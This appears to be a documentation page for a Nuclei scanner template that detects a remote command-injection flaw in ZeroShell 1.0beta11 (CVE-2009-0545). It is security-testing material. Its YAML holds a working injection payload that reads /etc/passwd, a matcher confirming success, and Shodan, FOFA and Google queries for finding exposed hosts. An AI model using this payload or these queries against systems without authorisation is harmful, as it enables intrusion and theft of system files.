Skip to content
Nuclei Templates

ZeroShell <= 1.0beta11 Remote Code Execution

ID: CVE-2009-0545

Severity: critical

Author: geeknik

Tags: cve,cve2009,edb,zeroshell,kerbynet,rce

Description

Section titled “Description”

ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.

YAML Source

Section titled “YAML Source”
id: CVE-2009-0545


info:
  name: ZeroShell <= 1.0beta11 Remote Code Execution
  author: geeknik
  severity: critical
  description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system.
  remediation: |
    Upgrade to a patched version of ZeroShell.
  reference:
    - https://www.exploit-db.com/exploits/8023
    - https://nvd.nist.gov/vuln/detail/CVE-2009-0545
    - http://www.zeroshell.net/eng/announcements/
    - http://www.ikkisoft.com/stuff/LC-2009-01.txt
    - http://www.vupen.com/english/advisories/2009/0385
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
    cvss-score: 10
    cve-id: CVE-2009-0545
    cwe-id: CWE-20
    epss-score: 0.97081
    epss-percentile: 0.99771
    cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zeroshell
    product: zeroshell
    shodan-query: http.title:"zeroshell"
    fofa-query: title="zeroshell"
    google-query: intitle:"zeroshell"
  tags: cve,cve2009,edb,zeroshell,kerbynet,rce


http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"


    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 490a00463044022003ac48d5e65599d7bf80665fd122b5d7db49d043ec4483abd60650f0838c418f02206e7887fecbc515b0038b4b0bc5c6b785e357f05acccae0eb84d35460500d1eb5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2009/CVE-2009-0545.yaml"

View on Github